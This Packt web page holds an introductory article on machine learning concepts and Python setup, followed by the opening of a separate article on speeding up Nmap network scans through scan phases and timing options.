Packt
23 Jun 2017
34 min read
Getting Started with Python and Machine Learning

In this article by Ivan Idris, Yuxi (Hayden) Liu, and Shoahoa Zhang, authors of the book Python Machine Learning By Example, we cover basic machine learning concepts. If you need more information, your local library, the Internet, and Wikipedia in particular should help you further. The topics covered in this article are as follows:

What is machine learning and why do we need it?
A very high level overview of machine learning
Generalizing with data
Overfitting and the bias variance trade off
Dimensions and features
Preprocessing, exploration, and feature engineering
Combining models
Installing software and setting up
Troubleshooting and asking for help

What is machine learning and why do we need it?

Machine learning is a term coined around 1960, composed of two words: machine, corresponding to a computer, robot, or other device, and learning, an activity most humans are good at. So we want machines to learn. But why not leave learning to the humans? It turns out that there are many problems, for instance those involving huge datasets, where it makes sense to let computers do all the work. In general, of course, computers and robots don't get tired, don't have to sleep, and may be cheaper. There is also an emerging school of thought called active learning, or human-in-the-loop, which advocates combining the efforts of machine learners and humans. The idea is that routine, boring tasks are more suitable for computers, and creative tasks more suitable for humans. According to this philosophy, machines are able to learn, but not everything.

Machine learning doesn't involve the traditional type of programming that uses business rules. A popular myth says that the majority of the code in the world, possibly programmed in COBOL, has to do with simple rules covering the bulk of all the possible scenarios of client interactions. So why can't we just hire many coders and continue programming new rules?
One reason is that the cost of defining and maintaining rules becomes very expensive over time. A lot of the rules involve matching strings or numbers, and change frequently. It's much easier and more efficient to let computers figure everything out themselves from data. Also, the amount of data is increasing, and the rate of growth is itself accelerating. Nowadays the floods of textual, audio, image, and video data are hard to fathom. The Internet of Things is a recent development of a new kind of Internet, which interconnects everyday devices and will bring data from household appliances and autonomous cars to the forefront. The average company these days has mostly human clients, but, for instance, social media companies tend to have many bot accounts. This trend is likely to continue, and we will have more machines talking to each other.

An application of machine learning that you may be familiar with is the spam filter, which filters out e-mails considered to be spam. Another is online advertising, where ads are served automatically based on information advertisers have collected about us. Yet another application of machine learning is search engines, which extract information about web pages so that you can efficiently search the Web. Many online shops and retail companies have recommender engines, which recommend products and services using machine learning. The list of applications is very long and also includes fraud detection, medical diagnosis, sentiment analysis, and financial market analysis.

In the 1983 movie War Games, a computer made life and death decisions that could have resulted in World War III. As far as I know, technology wasn't able to pull off such feats at the time. However, in 1997 the Deep Blue supercomputer did manage to beat a world chess champion. In 2005, a Stanford self-driving car drove by itself for more than 130 kilometers in a desert.
In 2007, the car of another team drove through regular traffic for more than 50 kilometers. In 2011, the Watson computer won a quiz against human opponents. In 2016, the AlphaGo program beat one of the best Go players in the world. If we assume that computer hardware is the limiting factor, then we can try to extrapolate into the future. Ray Kurzweil did just that, and according to him, we can expect human-level intelligence around 2029.

A very high level overview of machine learning

Machine learning is a subfield of artificial intelligence, a field of computer science concerned with creating systems that mimic human intelligence. Software engineering is another field of computer science, and we can label Python programming as a type of software engineering. Machine learning is also closely related to linear algebra, probability theory, statistics, and mathematical optimization. We use optimization and statistics to find the best models that explain our data. If you are not feeling confident about your mathematical knowledge, you are probably wondering how much time you should spend learning or brushing up. Fortunately, to get machine learning to work for you, most of the time you can ignore the mathematical details, as they are implemented by reliable Python libraries. You do need to be able to program.

If you want to study machine learning, you can enroll in computer science, artificial intelligence, and, more recently, data science master's programs. There are also various data science bootcamps; however, the selection for those is stricter and the course duration is often just a couple of months. Another option is the free massive open online courses available on the Internet. Machine learning is not only a skill, but also a bit of a sport. You can compete in several machine learning competitions, sometimes for decent cash prizes.
However, to win these competitions you may need to utilize techniques that are only useful in the context of competitions, and not in the context of solving a business problem.

A machine learning system requires inputs, which can be numerical, textual, visual, or audiovisual data. The system usually has outputs: for instance, a floating point number, an integer representing a category (also called a class), or the acceleration of a self-driving car. We need to define (or have defined for us by an algorithm) an evaluation function, called a loss or cost function, which tells us how well we are learning. This setup creates an optimization problem, with the goal of learning in the most efficient way. For instance, if we fit data to a line, also called linear regression, the goal is to have our line be as close as possible to the data points on average.

We can have unlabeled data that we want to group or explore; this is called unsupervised learning. Unsupervised learning can be used to detect anomalies, such as fraud or defective equipment. We can also have labeled examples to use for training; this is called supervised learning. The labels are usually provided by human experts, but if the problem is not too hard, they may also be produced by members of the public, through crowdsourcing for instance. Supervised learning is very common, and we can further subdivide it into regression and classification. Regression trains on continuous target variables, while classification attempts to find the appropriate class label. If only some of the examples are labeled and the rest are not, we have semi-supervised learning. A chess-playing program usually applies reinforcement learning, a type of learning where the program evaluates its own performance by, for instance, playing against itself or earlier versions of itself.
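As a minimal sketch of the supervised setup described above, we can fit a line to a handful of points and then predict an unseen value. The data here is made up (generated from an assumed "true" function y = 2x + 1 plus noise), and NumPy's least-squares polynomial fit stands in for a full linear regression library:

```python
import numpy as np

# Hypothetical training data: inputs x with labels y generated from
# the assumed true function y = 2x + 1 plus a little noise.
rng = np.random.default_rng(0)
x = np.arange(10, dtype=float)
y = 2 * x + 1 + rng.normal(scale=0.1, size=x.size)

# Fit a degree-1 polynomial (a line) by least squares: this minimizes
# the average squared distance between the line and the data points.
slope, intercept = np.polyfit(x, y, deg=1)

# Generalization: predict for an input the model has never seen.
print(round(slope * 20 + intercept, 1))  # close to 41, since 2*20 + 1 = 41
```

The squared-distance criterion minimized here is exactly the kind of loss function mentioned above.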
We can roughly categorize machine learning algorithms into logic-based learning, statistical learning, artificial neural networks, and genetic algorithms. In fact, we have a whole zoo of algorithms, with popularity varying over time. The logic-based systems were the first to be dominant. They used basic rules specified by human experts, and with these rules the systems tried to reason using formal logic. In the mid-1980s, artificial neural networks came to the foreground, only to be pushed aside by statistical learning systems in the 1990s. Artificial neural networks imitate animal brains and consist of interconnected neurons, which are in turn an imitation of biological neurons. Genetic algorithms, which mimic the biological process of evolution, were also pretty popular in the 1990s (or at least that was my impression). We are currently (2016) seeing a revolution in deep learning, which we may consider a rebranding of neural networks. The term deep learning was coined around 2006 and refers to deep neural networks with many layers. The breakthrough in deep learning was caused, among other things, by the availability of graphics processing units (GPUs), which speed up computation considerably. GPUs were originally intended to render video games and are very good at parallel matrix and vector algebra. It is believed that deep learning resembles the way humans learn; therefore, it may be able to deliver on the promise of sentient machines.

You may have heard of Moore's law, an empirical law which claims that computer hardware improves exponentially with time. The law was first formulated by Gordon Moore, the co-founder of Intel, in 1965. According to the law, the number of transistors on a chip should double every two years. In the following graph, you can see that the law holds up nicely (the size of the bubbles corresponds to the average transistor count in GPUs). The consensus seems to be that Moore's law should continue to be valid for a couple of decades.
This gives some credibility to Ray Kurzweil's prediction of achieving true machine intelligence in 2029.

We will encounter many of these types of machine learning later in this book. Most of the content is about supervised learning, with some examples of unsupervised learning. The popular Python libraries support all these types of learning.

Generalizing with data

The good thing about data is that there is a lot of it in the world. The bad thing is that it is hard to process. The challenges stem from the diversity and noisiness of the data. We as humans usually process data coming in through our ears and eyes. These inputs are transformed into electrical or chemical signals. On a very basic level, computers and robots also work with electrical signals, which are then translated into ones and zeroes. However, we program in Python in this book, and on that level we normally represent the data as numbers, images, or text. Actually, images and text are not very convenient, so we need to transform them into numerical values.

Especially in the context of supervised learning, we have a scenario similar to studying for an exam. We have a set of practice questions and the actual exam. We should be able to answer exam questions without knowing the answers to them. This is called generalization: we learn something from our practice questions and hopefully are able to apply this knowledge to other, similar questions. Finding good representative examples is not always an easy task, depending on the complexity of the problem we are trying to solve and how generic the solution needs to be.

An old-fashioned programmer would talk to a business analyst or other expert, and then implement a rule that adds a certain value multiplied by another value, corresponding, for instance, to tax rules. In a machine learning setup, we can give the computer example input values and example output values.
Or, if we are more ambitious, we can feed the program the actual tax texts and let the machine process the data further, just like an autonomous car doesn't need a lot of human input. This means implicitly that there is some function, for instance a tax formula, that we are trying to find. In physics we have almost the same situation: we want to know how the universe works, and formulate laws in a mathematical language. Since we don't know the actual function, all we can do is measure our error and try to minimize it. In supervised learning, we compare our results against the expected values. In unsupervised learning, we measure our success with related metrics; for instance, we want clusters of data to be well defined. In reinforcement learning, a program evaluates its moves, for example in a chess game, using some predefined function.

Overfitting and the bias variance trade off

Overfitting (one word) is such an important concept that I decided to start discussing it very early in this book. If you go through many practice questions for an exam, you may start to find ways to answer questions that have nothing to do with the subject material. For instance, you may find that if you have the word potato in the question, the answer is A, even if the subject has nothing to do with potatoes. Or, even worse, you may memorize the answers to each question verbatim. We can then score high on the practice questions, which are called the train set in machine learning. However, we will score very low on the exam questions, which are called the test set in machine learning. This phenomenon of memorization is called overfitting. Overfitting almost always means that we are trying too hard to extract information from the data (random quirks), and using more training data will not help. The opposite scenario is called underfitting. When we underfit, we don't have a very good result on the train set, but also not a very good result on the test set.
Underfitting may indicate that we are not using enough data, or that we should try harder to do something useful with the data. Obviously, we want to avoid both scenarios. Machine learning errors are the sum of bias and variance. Variance measures how much the error varies. Imagine that we are trying to decide what to wear based on the weather outside. If you have grown up in a country with a tropical climate, you may be biased towards always wearing summer clothes. If you lived in a cold country, you may decide to go to a beach in Bali wearing winter clothes. Both decisions have high bias. You may also just wear random clothes that are not appropriate for the weather outside; this is an outcome with high variance. It turns out that when we try to minimize bias or variance, we tend to increase the other, a concept known as the bias variance tradeoff. The expected error is given by the following equation, where the last term is the irreducible error:

expected error = bias^2 + variance + irreducible error

Cross-validation

Cross-validation is a technique that helps to avoid overfitting. Just like we would have a separation of practice questions and exam questions, we also have training sets and test sets. It's important to keep the data separated and only use the test set in the final stage. There are many cross-validation schemes in use. The most basic setup splits the data at a specified percentage, for instance 75% train data and 25% test data. We can also leave out a fixed number of observations in multiple rounds, so that these items are in the test set once and the rest of the data is in the train set. For instance, we can apply leave-one-out cross-validation (LOOCV) and let each datum be in the test set once. For a large dataset, LOOCV requires as many rounds as there are data items and can therefore be too slow. k-fold cross-validation is cheaper than LOOCV: it randomly splits the data into k (a positive integer) folds. One of the folds becomes the test set, and the rest of the data becomes the train set.
We repeat this process k times, with each fold being the designated test set once. Finally, we average the k train and test errors for the purpose of evaluation. Common values for k are five and ten. The following table illustrates the setup for five folds:

Iteration  Fold 1  Fold 2  Fold 3  Fold 4  Fold 5
1          Test    Train   Train   Train   Train
2          Train   Test    Train   Train   Train
3          Train   Train   Test    Train   Train
4          Train   Train   Train   Test    Train
5          Train   Train   Train   Train   Test

We can also randomly split the data into train and test sets multiple times. The problem with this algorithm is that some items may never end up in the test set, while others may be selected for the test set multiple times. Nested cross-validation is a combination of cross-validations, consisting of the following:

The inner cross-validation does optimization to find the best fit, and can be implemented as k-fold cross-validation.
The outer cross-validation is used to evaluate performance and do statistical analysis.

Regularization

Regularization, like cross-validation, is a general technique to fight overfitting. Regularization adds extra parameters to the error function we are trying to minimize, in order to penalize complex models. For instance, if we are trying to fit a curve with a high-order polynomial, we may use regularization to reduce the influence of the higher degrees, thereby effectively reducing the order of the polynomial. Simpler methods are to be preferred, at least according to the principle of Occam's razor. William of Occam was a monk and philosopher who, around 1320, came up with the idea that the simplest hypothesis that fits the data should be preferred. One justification is that there are fewer simple models than complex models. For instance, intuitively we know that there are more high-order polynomial models than linear ones. The reason is that a line (f(x) = ax + b) is governed by only two numbers: the intercept b and the slope a.
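The five-fold scheme described above can be sketched in plain Python. This hand-rolled version assigns indices to folds deterministically for clarity (a real split would shuffle first, and in practice scikit-learn's KFold produces these splits for us):

```python
# Sketch of 5-fold cross-validation indices for 20 hypothetical examples.
data = list(range(20))
k = 5
folds = [data[i::k] for i in range(k)]  # round-robin fold assignment

for test_fold in folds:
    train = [x for fold in folds if fold is not test_fold for x in fold]
    # Here we would fit a model on train and evaluate it on test_fold;
    # each example ends up in the test role exactly once.
    assert len(test_fold) == 4 and len(train) == 16

print([fold[0] for fold in folds])  # [0, 1, 2, 3, 4]
```

Averaging the k evaluation scores collected in the loop gives the final cross-validated estimate.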
The possible coefficients for a line span a two-dimensional space. A quadratic polynomial adds an extra coefficient for the quadratic term, so its coefficients span a three-dimensional space. It is therefore less likely that we stumble on a linear model that fits the data than on a more complex model, because the search space for linear models is much smaller (although it is infinite). And of course, simpler models are just easier to use and require less computation time.

We can also stop a program early as a form of regularization. If we give a machine learner less time, it is more likely to produce a simpler model and, we hope, less likely to overfit. Of course, we have to do this in an ordered fashion, which means the algorithm should be aware of the possibility of early termination.

Dimensions and features

We typically represent the data as a grid of numbers (a matrix). Each column represents a variable, which we call a feature in machine learning. In supervised learning, one of the variables is actually not a feature, but the label that we are trying to predict, and each row is an example that we can use for training or testing. The number of features corresponds to the dimensionality of the data. Our machine learning approach depends on the number of dimensions versus the number of examples. For instance, text and image data are very high dimensional, while stock market data has relatively few dimensions. Fitting high dimensional data is computationally expensive and is also prone to overfitting due to the high complexity. Higher dimensions are also impossible to visualize, and therefore we can't use simple diagnostic methods. Not all features are useful; they may only add randomness to our results. It is therefore often important to do good feature selection. Feature selection is a form of dimensionality reduction. Some machine learning algorithms are actually able to perform feature selection automatically.
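One example of such automatic feature selection is an L1-penalized linear model, which shrinks the coefficients of uninformative features to exactly zero. The sketch below assumes scikit-learn is available and uses made-up data in which only the first of three features actually drives the target:

```python
import numpy as np
from sklearn.linear_model import Lasso

# Hypothetical data: 3 features, but only the first one matters.
rng = np.random.default_rng(1)
X = rng.normal(size=(200, 3))
y = 3.0 * X[:, 0] + rng.normal(scale=0.1, size=200)

# The L1 penalty (Lasso) zeroes out the useless coefficients,
# performing feature selection as a side effect of fitting.
model = Lasso(alpha=0.1).fit(X, y)
print(model.coef_)  # only the first coefficient is clearly non-zero
```

The surviving non-zero coefficients identify the selected features; the penalty strength alpha controls how aggressively features are dropped.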
We should be careful not to omit features that do contain information. Some practitioners evaluate the correlation between a single feature and the target variable. In my opinion, you shouldn't do that, because the correlation of one variable with the target doesn't in itself tell you much; instead, use an off-the-shelf algorithm and evaluate the results of different feature subsets. In principle, feature selection boils down to multiple binary decisions about whether to include a feature or not. For n features, we get 2^n feature sets, which can be a very large number. For example, for 10 features we have 1024 possible feature sets (for instance, if we are deciding what clothes to wear, the features can be temperature, rain, the weather forecast, where we are going, and so on). At a certain point, brute force evaluation becomes infeasible. We will discuss better methods in this book. Basically, we have two options: we either start with all the features and remove features iteratively, or we start with a minimum set of features and add features iteratively. We then take the best feature sets for each iteration, and compare them.

Another common dimensionality reduction approach is to transform high-dimensional data into a lower-dimensional space. This transformation leads to information loss, but we can keep the loss to a minimum. We will cover this in more detail later on.

Preprocessing, exploration, and feature engineering

Data mining, a buzzword of the 1990s, is the predecessor of data science (the science of data). One of the methodologies popular in the data mining community is called the cross industry standard process for data mining (CRISP-DM). CRISP-DM was created in 1996 and is still used today. I am not endorsing CRISP-DM; however, I like its general framework.
CRISP-DM consists of the following phases, which are not mutually exclusive and can occur in parallel:

Business understanding: This phase is often taken care of by specialized domain experts. Usually we have a business person formulate a business problem, such as selling more units of a certain product.
Data understanding: This is also a phase that may require input from domain experts; however, a technical specialist often needs to get involved more than in the business understanding phase. The domain expert may be proficient with spreadsheet programs, but have trouble with complicated data. In this book I usually call this phase exploration.
Data preparation: This is also a phase where a domain expert with only Excel know-how may not be able to help you. This is the phase where we create our training and test datasets. In this book I usually call this phase preprocessing.
Modeling: This is the phase that most people associate with machine learning. In this phase we formulate a model and fit our data.
Evaluation: In this phase, we evaluate our model and our data to check whether we were able to solve our business problem.
Deployment: This phase usually involves setting up the system in a production environment (it is considered good practice to have a separate production system). Typically this is done by a specialized team.

When we learn, we require high quality learning material. We can't learn from gibberish, so we automatically ignore anything that doesn't make sense. A machine learning system isn't able to recognize gibberish, so we need to help it by cleaning the input data. It is often claimed that cleaning the data forms a large part of machine learning. Sometimes the cleaning is already done for us, but you shouldn't count on it. To decide how to clean the data, we need to be familiar with the data. There are some projects that try to automatically explore the data and do something intelligent, like producing a report.
For now, unfortunately, we don't have a solid solution, so you need to do some manual work. We can do two things, which are not mutually exclusive: first, scan the data, and second, visualize the data. What to do also depends on the type of data we are dealing with: a grid of numbers, images, audio, text, or something else. In the end, a grid of numbers is the most convenient form, and we will always work towards having numerical features. We want to know whether features have missing values, how the values are distributed, and what types of features we have. Values can approximately follow a normal distribution, a binomial distribution, a Poisson distribution, or another distribution altogether. Features can be binary: either yes or no, positive or negative, and so on. They can also be categorical, pertaining to a category, for instance continents (Africa, Asia, Europe, Latin America, North America, and so on). Categorical variables can also be ordered, for instance high, medium, and low. Features can also be quantitative, for example temperature in degrees or price in dollars.

Feature engineering is the process of creating or improving features. It's more of a dark art than a science. Features are often created based on common sense, domain knowledge, or prior experience. There are certain common techniques for feature creation; however, there is no guarantee that creating new features will improve your results. We are sometimes able to use the clusters found by unsupervised learning as extra features. Deep neural networks are often able to create features automatically.

Missing values

Quite often we are missing values for certain features. This could happen for various reasons: it can be inconvenient, expensive, or even impossible to always have a value. Maybe we were not able to measure a certain quantity in the past because we didn't have the right equipment, or we just didn't know that the feature was relevant. However, we are stuck with missing values from the past.
Sometimes it's easy to figure out that values are missing: we can discover this just by scanning the data, or by counting the number of values we have for a feature and comparing it to the number of values we expect based on the number of rows. Certain systems encode missing values with a special value, for example 999999, which makes sense only if the valid values are much smaller than 999999. If you are lucky, you will have information about the features provided by whoever created the data, in the form of a data dictionary or metadata.

Once we know that values are missing, the question arises of how to deal with them. The simplest answer is to just ignore them. However, some algorithms can't deal with missing values, and the program will just refuse to continue. In other circumstances, ignoring missing values will lead to inaccurate results. The second solution is to substitute a fixed value for the missing values; this is called imputing. We can impute the arithmetic mean, median, or mode of the valid values of a certain feature. Ideally, we will have a somewhat reliable relation between features, or within a variable. For instance, we may know the seasonal averages of temperature for a certain location and be able to impute guesses for missing temperature values given a date.

Label encoding

Humans are able to deal with various types of values. Machine learning algorithms, with some exceptions, need numerical values. If we offer a string such as Ivan, the program will not know what to do unless we are using specialized software. In this example we are dealing with a categorical feature, names probably. We can consider each unique value to be a label. (In this particular example, we also need to decide what to do with the case: is Ivan the same as ivan?) We can then replace each label with an integer; this is called label encoding. This approach can be problematic, because the learner may conclude that there is an ordering.
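A minimal label-encoding sketch in plain Python (scikit-learn ships a LabelEncoder that does the same job; the continent values here are just illustrative):

```python
# Hypothetical categorical feature: continent names.
values = ["Asia", "Europe", "Asia", "Africa", "Europe"]

# Map each unique label to an integer. Sorting makes the mapping
# deterministic, but note that a learner may wrongly infer an
# ordering from these integers -- the problem mentioned above.
labels = sorted(set(values))
encoding = {label: index for index, label in enumerate(labels)}
encoded = [encoding[v] for v in values]

print(encoded)  # [1, 2, 1, 0, 2]
```

The spurious ordering these integers suggest (Africa < Asia < Europe) is exactly what one-hot encoding, covered next, avoids.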
One hot encoding

The one-of-K or one-hot encoding scheme uses dummy variables to encode categorical features. Originally it was applied to digital circuits. The dummy variables have binary values like bits, so they take the value zero or one (equivalent to true or false). For instance, if we want to encode continents, we will have dummy variables such as is_asia, which will be true if the continent is Asia and false otherwise. In general, we need as many dummy variables as there are unique labels minus one. We can determine one of the labels automatically from the dummy variables, because the dummy variables are exclusive: if the dummy variables all have a false value, then the correct label is the label for which we don't have a dummy variable. The following table illustrates the encoding for continents:

               Is_africa  Is_asia  Is_europe  Is_south_america  Is_north_america
Africa         True       False    False      False             False
Asia           False      True     False      False             False
Europe         False      False    True       False             False
South America  False      False    False      True              False
North America  False      False    False      False             True
Other          False      False    False      False             False

The encoding produces a matrix (grid of numbers) with lots of zeroes (false values) and occasional ones (true values). This type of matrix is called a sparse matrix. The sparse matrix representation is handled well by the SciPy package and shouldn't be an issue. We will discuss the SciPy package later in this article.

Scaling

Values of different features can differ by orders of magnitude. Sometimes this means that the larger values dominate the smaller values, depending on the algorithm we are using. For certain algorithms to work properly, we are required to scale the data. There are several common strategies that we can apply. Standardization removes the mean of a feature and divides by the standard deviation. If the feature values are normally distributed, we will get a Gaussian that is centered around zero with a variance of one.
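Standardization as just described can be sketched with NumPy (scikit-learn's StandardScaler wraps the same computation; the feature values are made up):

```python
import numpy as np

# Hypothetical feature column with values on a large scale.
feature = np.array([100.0, 110.0, 120.0, 130.0, 140.0])

# Remove the mean and divide by the standard deviation.
standardized = (feature - feature.mean()) / feature.std()

print(standardized.mean())  # 0.0
print(round(standardized.std(), 6))  # 1.0
```

After this transform, the feature no longer dominates smaller-scale features purely because of its units.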
If the feature values are not normally distributed, we can instead remove the median and divide by the interquartile range, which is the range between the first and third quartile (or the 25th and 75th percentile). Scaling features to a range is another common strategy; a popular choice is the range between zero and one.

Polynomial features

If we have two features, a and b, we can suspect that there is a polynomial relation, such as a^2 + ab + b^2. We can consider each term in the sum to be a feature; in this example we have three features. The product ab in the middle is called an interaction. An interaction doesn't have to be a product; although that is the most common choice, it can also be a sum, a difference, or a ratio. If we are using a ratio, to avoid dividing by zero we should add a small constant to the divisor and dividend. The number of features and the order of the polynomial are not limited. However, if we follow Occam's razor, we should avoid higher order polynomials and interactions of many features. In practice, complex polynomial relations tend to be more difficult to compute and not add much value, but if you really need better results they may be worth considering.

Power transformations

Power transforms are functions that we can use to transform numerical features into a more convenient form, for instance to conform better to a normal distribution. A very common transform for values that vary by orders of magnitude is to take the logarithm. Taking the logarithm of zero or of negative values is not defined, so we may need to add a constant to all the values of the related feature before taking the logarithm. We can also take the square root of positive values, square the values, or compute any other power we like. Another useful transform is the Box-Cox transform, named after its creators. The Box-Cox transform attempts to find the best power needed to transform the original data into data that is closer to the normal distribution.
The transform is defined as follows:

y(λ) = (y^λ - 1) / λ  if λ ≠ 0
y(λ) = ln(y)          if λ = 0

Binning

Sometimes it's useful to separate feature values into several bins. For example, we may only be interested in whether it rained on a particular day. Given the precipitation values, we can binarize them, so that we get a true value if the precipitation value is not zero, and a false value otherwise. We can also use statistics to divide values into high, medium, and low bins. The binning process inevitably leads to loss of information. However, depending on your goals, this may not be an issue, and it may actually reduce the chance of overfitting. There will certainly be improvements in speed and memory or storage requirements.

Combining models

In (high) school we sit together with other students and learn together, but we are not supposed to work together during the exam. The reason is, of course, that teachers want to know what we have learned, and if we just copy exam answers from friends, we may have learned nothing. Later in life we discover that teamwork is important. For example, this book is the product of a whole team, or possibly a group of teams. Clearly a team can produce better results than a single person. However, this goes against Occam's razor, since a single person can come up with simpler theories compared to what a team will produce. In machine learning we nevertheless prefer to have our models cooperate, with the following schemes:

Bagging
Boosting
Stacking
Blending
Voting and averaging

Bagging

Bootstrap aggregating, or bagging, is an algorithm introduced by Leo Breiman in 1994, which applies bootstrapping to machine learning problems. Bootstrapping is a statistical procedure that creates datasets from existing data by sampling with replacement. Bootstrapping can be used to analyze the possible values that the arithmetic mean, variance, or another quantity can assume.
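A minimal pure-Python sketch of bootstrapping the mean (the data is hypothetical; in practice NumPy or scikit-learn's resample utilities would be used):

```python
import random

random.seed(42)
data = [2.0, 4.0, 6.0, 8.0, 10.0]  # hypothetical sample, mean 6.0

# Draw many bootstrap datasets (sampling with replacement) and look
# at the spread of the resampled means.
means = []
for _ in range(1000):
    resample = [random.choice(data) for _ in data]
    means.append(sum(resample) / len(resample))

print(min(means), max(means))  # the resampled means scatter around 6.0
```

The spread of these resampled means estimates how uncertain the original sample mean is; bagging applies the same resampling idea to training sets, as the steps below show.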
The algorithm aims to reduce the chance of overfitting with the following steps:

1. Generate new training sets from the input training data by sampling with replacement.
2. Fit a model to each generated training set.
3. Combine the results of the models by averaging or majority voting.

Boosting

In the context of supervised learning, we define weak learners as learners that are just a little better than a baseline, such as randomly assigning classes or predicting average values. Although weak learners are individually weak, like ants, together they can do amazing things, just as ants can. It makes sense to take into account the strength of each individual learner using weights. This general idea is called boosting. There are many boosting algorithms; they differ mostly in their weighting scheme. If you have studied for an exam, you may have applied a similar technique by identifying the type of practice questions you had trouble with and focusing on the hard problems. Face detection in images is based on a specialized framework that also uses boosting. Detecting faces in images or videos is a supervised learning problem. We give the learner examples of regions containing faces. There is an imbalance, since we usually have far more regions (about ten thousand times more) that don't contain faces. A cascade of classifiers progressively filters out negative image areas stage by stage. In each stage, the classifiers use progressively more features on fewer image windows. The idea is to spend the most time on image patches that contain faces. In this context, boosting is used to select features and combine results.

Stacking

Stacking takes the outputs of machine learning estimators and uses them as inputs for another algorithm. You can, of course, feed the output of the higher-level algorithm to yet another predictor. It is possible to use any arbitrary topology, but for practical reasons you should try a simple setup first, as also dictated by Occam's razor.
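Recent versions of scikit-learn (0.22 and later, so newer than the release this book targets) ship a ready-made StackingClassifier; a minimal sketch on synthetic data, where the dataset and the estimator choices are purely illustrative:

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import StackingClassifier, RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

X, y = make_classification(n_samples=500, n_features=10, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

# The outputs of the level-0 estimators become the input features
# of the final logistic regression estimator
stack = StackingClassifier(
    estimators=[("rf", RandomForestClassifier(random_state=0)),
                ("lr", LogisticRegression(max_iter=1000))],
    final_estimator=LogisticRegression())
stack.fit(X_train, y_train)
print(stack.score(X_test, y_test))
```

Keeping the topology this simple — two base estimators and one final estimator — is usually the right starting point, per the Occam's razor advice above.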
Blending

Blending was introduced by the winners of the one million dollar Netflix prize. Netflix organized a contest with the challenge of finding the best model to recommend movies to its users. Netflix users can rate a movie with one to five stars. Obviously, no user was able to rate every movie, so the user-movie matrix is sparse. Netflix published an anonymized training and test set. Researchers later found a way to correlate the Netflix data with IMDb data, and for privacy reasons the Netflix data is no longer available. The grand prize was won in 2009 by a group of teams combining their models. Blending is a form of stacking; in blending, however, the final estimator trains only on a small portion of the training data.

Voting and averaging

We can arrive at our final answer through majority voting or averaging. It's also possible to assign a different weight to each model in the ensemble. For averaging, we can also use the geometric mean or the harmonic mean instead of the arithmetic mean. Usually, combining the results of models that are highly correlated with each other doesn't lead to spectacular improvements. It's better to somehow diversify the models by using different features or different algorithms. If we find that two models are strongly correlated, we may, for example, decide to remove one of them from the ensemble and increase the weight of the other model proportionally.
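Weighted voting and the three kinds of mean can be written directly with NumPy (the predictions and weights below are made up for illustration):

```python
import numpy as np

# Probability predictions of three models for three samples
preds = np.array([[0.9, 0.8, 0.7],
                  [0.6, 0.5, 0.9],
                  [0.8, 0.4, 0.6]])
weights = np.array([0.5, 0.3, 0.2])  # heavier weight for better models

arithmetic = np.average(preds, axis=0, weights=weights)
geometric = np.exp(np.average(np.log(preds), axis=0, weights=weights))
harmonic = 1.0 / np.average(1.0 / preds, axis=0, weights=weights)

# Simple (unweighted) majority vote at a 0.5 threshold
majority = (preds > 0.5).sum(axis=0) >= 2
print(arithmetic, geometric, harmonic, majority)
```

For positive predictions the three means always satisfy harmonic <= geometric <= arithmetic, so the geometric and harmonic means are slightly more conservative choices.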
There are various ways to speed up the code; however, they are out of scope for this book, so if you want to know more, please consult the documentation. Matplotlib is a plotting and visualization package. We can also use the seaborn package for visualization. Seaborn uses matplotlib under the hood. There are several other Python visualization packages that cover different usage scenarios. Matplotlib and seaborn are mostly useful for visualizing small to medium datasets. The NumPy package offers the ndarray class and various useful array functions. The ndarray class is an array that can be one- or multi-dimensional. This class also has several subclasses representing matrices, masked arrays, and heterogeneous record arrays. In machine learning we mainly use NumPy arrays to store feature vectors or matrices composed of feature vectors. SciPy uses NumPy arrays and offers a variety of scientific and mathematical functions. We also require the pandas library for data wrangling. In this book we will use Python 3. As you may know, Python 2 will no longer be supported after 2020, so I strongly recommend switching to Python 3. If you are stuck with Python 2, you should still be able to modify the example code to work for you. In my opinion, the Anaconda Python 3 distribution is the best option. Anaconda is a free Python distribution for data analysis and scientific computing. It has its own package manager, conda. The distribution includes more than 200 Python packages, which makes it very convenient. For casual users, the Miniconda distribution may be the better choice. Miniconda contains the conda package manager and Python. The procedures to install Anaconda and Miniconda are similar. Obviously, Anaconda takes more disk space. Follow the instructions from the Anaconda website at http://conda.pydata.org/docs/install/quick.html. First, you have to download the appropriate installer for your operating system and Python version.
Sometimes you can choose between a GUI and a command line installer. I used the Python 3 installer, although my system Python version is 2.7. This is possible since Anaconda comes with its own Python. On my machine, the Anaconda installer created an anaconda directory in my home directory and required about 900 MB. The Miniconda installer installs a miniconda directory in your home directory. Installation instructions for NumPy are at http://docs.scipy.org/doc/numpy/user/install.html. Alternatively, install NumPy with pip as follows:

$ [sudo] pip install numpy

The command for Anaconda users is:

$ conda install numpy

To install the other dependencies, substitute NumPy with the appropriate package. Please read the documentation carefully; not all options work equally well for each operating system. The pandas installation documentation is at http://pandas.pydata.org/pandas-docs/dev/install.html.
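After installing, a quick sanity check confirms that NumPy imports correctly and shows how feature vectors are stored as the rows of a feature matrix (the numbers are made up):

```python
import numpy as np

# Three samples, each described by two features: a 3x2 feature matrix
X = np.array([[5.1, 3.5],
              [4.9, 3.0],
              [6.2, 3.4]])

print(X.shape)         # (3, 2): three feature vectors of length two
print(X.mean(axis=0))  # per-feature means, handy for scaling later
```

If this script runs without errors, NumPy is installed and working.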
Packt
23 Jun 2017
20 min read

To Optimize Scans

In this article by Paulino Calderon Pale, author of the book Nmap Network Exploration and Security Auditing Cookbook, Second Edition, we will explore the following topics:

Skipping phases to speed up scans
Selecting the correct timing template
Adjusting timing parameters
Adjusting performance parameters

(For more resources related to this topic, see here.)

One of my favorite things about Nmap is how customizable it is. If configured properly, Nmap can be used to scan from single targets to millions of IP addresses in a single run. However, we need to be careful: we need to understand the configuration options and scanning phases that can affect performance, but most importantly, we need to really think about our scan objective beforehand. Do we need the information from the reverse DNS lookup? Do we know all targets are online? Is the network congested? Do targets respond fast enough? These and many more aspects can really add to your scanning time. Therefore, optimizing scans is important and can save us hours if we are working with many targets. This article starts by introducing the different scanning phases and the timing and performance options. Unless we have a solid understanding of what goes on behind the curtains during a scan, we won't be able to completely optimize our scans. Timing templates are designed to work in common scenarios, but we want to go further and shave off those extra seconds per host during our scans. Remember that this can improve not only performance but accuracy as well. Maybe those targets marked as offline were simply too slow to respond to the probes after all.

Skipping phases to speed up scans

Nmap scans can be broken into phases. When we are working with many hosts, we can save time by skipping tests or phases that return information we don't need or that we already have. By carefully selecting our scan flags, we can significantly improve the performance of our scans.
